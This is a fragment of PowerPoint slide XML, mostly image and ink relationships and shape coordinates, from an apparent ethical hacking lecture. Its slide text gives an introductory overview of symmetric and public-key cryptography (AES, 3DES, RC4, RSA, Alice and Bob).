Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image319.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image325.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink331.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink335.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image329.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink339.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink342.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink346.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image343.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image347.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink359.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink363.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink328.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink350.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image351.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image355.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink367.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image318.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink330.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image324.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image328.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image332.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image334.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image338.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink354.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink358.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink334.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink345.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image342.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image346.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink362.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36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7.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image327.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink338.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image333.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink349.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink353.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink329.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image331.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image337.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image341.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image345.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink357.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink361.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image354.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink365.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image358.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink326.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image323.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink333.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink344.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink341.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink352.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image353.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink360.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink325.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image330.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink336.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image335.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink347.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image348.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink355.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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81.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image367.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image377.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink392.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink400.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image398.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink413.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink376.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image362.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink384.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image375.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink395.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image385.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink408.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image359.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image401.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink416.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink379.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink390.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image388.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink403.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink411.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink374.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image365.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image369.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image373.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink387.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image379.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink398.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink402.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink378.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink389.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image383.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image387.png"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image391.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink406.xml"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink410.xml"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink414.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image364.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image368.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink382.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink386.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink393.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink397.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink373.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image372.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image378.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image382.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image386.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink401.xml"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink405.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image395.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink409.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image399.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image403.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image405.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink370.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image361.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image363.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink377.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink388.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink385.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image381.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink396.xml"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image404.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image360.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink404.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image402.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink369.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image371.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink380.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image376.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink391.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image389.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink412.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink399.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image366.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink375.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink383.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image374.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image384.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink407.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink372.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink394.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink415.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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038600"/>
            <a:ext cx="7467600" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethical Hacking – Lecture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John Black				       Fall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Crash Course in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Symmetric Key Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice and Bob share a copy of same key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typical methods, AES-CBC, 3DES-EDE-CBC, RC4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric Cryptography (aka Public-Key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice generates a “key pair”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A_{pub}, A_{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>priv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She sends public key to Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bob encrypts with A_{pub}, sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ciphertext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice (and only Alice) can decrypt with A_{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>priv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Typical methods, RSA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CFF7C-0572-EA42-A7FE-7FA8D7B7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4DE56C3-94D9-9F4F-965B-ACB4ADEA1786}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="412953" y="1827112"/>
            <a:ext cx="7982280" cy="1188000"/>
            <a:chOff x="412953" y="1827112"/>
            <a:chExt cx="7982280" cy="118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070F6A2-1E08-404D-829E-20A602C68209}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="421593" y="1827112"/>
                <a:ext cx="332280" cy="732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070F6A2-1E08-404D-829E-20A602C6820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2593" y="1818472"/>
                  <a:ext cx="349920" cy="75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AD18914-B581-F546-BFBF-B39BA2693F90}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="412953" y="2317072"/>
                <a:ext cx="288360" cy="49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AD18914-B581-F546-BFBF-B39BA2693F9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3953" y="2308072"/>
                  <a:ext cx="3060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CDF5CDF-E187-9C4F-9613-EE159D78FB37}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="842793" y="2790832"/>
                <a:ext cx="360" cy="146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CDF5CDF-E187-9C4F-9613-EE159D78FB3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33793" y="2781832"/>
                  <a:ext cx="180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E31D3F5-945C-C24A-80EE-3F84BCFAD0CC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="852873" y="2819992"/>
                <a:ext cx="138600" cy="195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E31D3F5-945C-C24A-80EE-3F84BCFAD0C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43873" y="2811352"/>
                  <a:ext cx="1562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7C22227-20EF-F348-9CCA-C10EB21FC5AC}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7875393" y="1988752"/>
                <a:ext cx="105120" cy="630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7C22227-20EF-F348-9CCA-C10EB21FC5A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66393" y="1979752"/>
                  <a:ext cx="122760" cy="64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CA64BFB-C484-1946-AD4C-CD285793D864}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7742913" y="1912792"/>
                <a:ext cx="509760" cy="673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CA64BFB-C484-1946-AD4C-CD285793D86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34273" y="1904152"/>
                  <a:ext cx="527400" cy="69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BCE42C8-0243-FA4E-8916-12B90D405B6A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8263113" y="2650072"/>
                <a:ext cx="360" cy="140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BCE42C8-0243-FA4E-8916-12B90D405B6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54113" y="2641072"/>
                  <a:ext cx="180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2FD79B6-F46D-DD47-9F3E-DA8ECF218A97}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8268513" y="2662672"/>
                <a:ext cx="126720" cy="159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2FD79B6-F46D-DD47-9F3E-DA8ECF218A9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59513" y="2654032"/>
                  <a:ext cx="1443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C8A5F4D-D394-3C4E-A3B9-91BD33554907}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1411593" y="2123752"/>
                <a:ext cx="6287760" cy="282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C8A5F4D-D394-3C4E-A3B9-91BD3355490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02593" y="2114752"/>
                  <a:ext cx="6305400" cy="30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841DDDA-7FA9-E741-9469-517592431A6E}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="551193" y="3350632"/>
              <a:ext cx="249120" cy="3121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841DDDA-7FA9-E741-9469-517592431A6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2553" y="3341992"/>
                <a:ext cx="26676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10322AA-1427-E54D-8EC3-777BFD276F18}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4268193" y="2371792"/>
              <a:ext cx="165960" cy="9018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10322AA-1427-E54D-8EC3-777BFD276F1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59193" y="2363152"/>
                <a:ext cx="183600" cy="91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0D6B1058-CA13-F641-9F1A-E3D277FFC216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4338393" y="3454672"/>
            <a:ext cx="298440" cy="391320"/>
            <a:chOff x="4338393" y="3454672"/>
            <a:chExt cx="298440" cy="39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CCF383E-7578-B44A-A5FE-2321BE9556B3}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4338393" y="3502912"/>
                <a:ext cx="298440" cy="343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CCF383E-7578-B44A-A5FE-2321BE9556B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29393" y="3493912"/>
                  <a:ext cx="31608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2AA9627-2E0F-934C-9797-F374F7D6E36C}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4354593" y="3654112"/>
                <a:ext cx="244080" cy="75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2AA9627-2E0F-934C-9797-F374F7D6E36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45593" y="3645112"/>
                  <a:ext cx="2617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F977F3E-7CD2-674A-90A5-83348840326A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4348473" y="3454672"/>
                <a:ext cx="250920" cy="104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F977F3E-7CD2-674A-90A5-83348840326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39833" y="3446032"/>
                  <a:ext cx="26856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3B81485-1FAC-574E-8208-BFAF2EC33022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="630393" y="4189072"/>
            <a:ext cx="1900080" cy="741240"/>
            <a:chOff x="630393" y="4189072"/>
            <a:chExt cx="1900080" cy="74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EEFEA35-BEB4-0D41-AC58-3F2DD5E5082D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="630393" y="4330552"/>
                <a:ext cx="264240" cy="379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EEFEA35-BEB4-0D41-AC58-3F2DD5E5082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1753" y="4321552"/>
                  <a:ext cx="28188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65879AC-0FE8-AB43-A483-5DF9187DB087}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="936753" y="4604152"/>
                <a:ext cx="4320" cy="146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65879AC-0FE8-AB43-A483-5DF9187DB08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7753" y="4595152"/>
                  <a:ext cx="219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5E26AEA-F208-2442-B2A3-E27F56B056B1}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="929913" y="4622152"/>
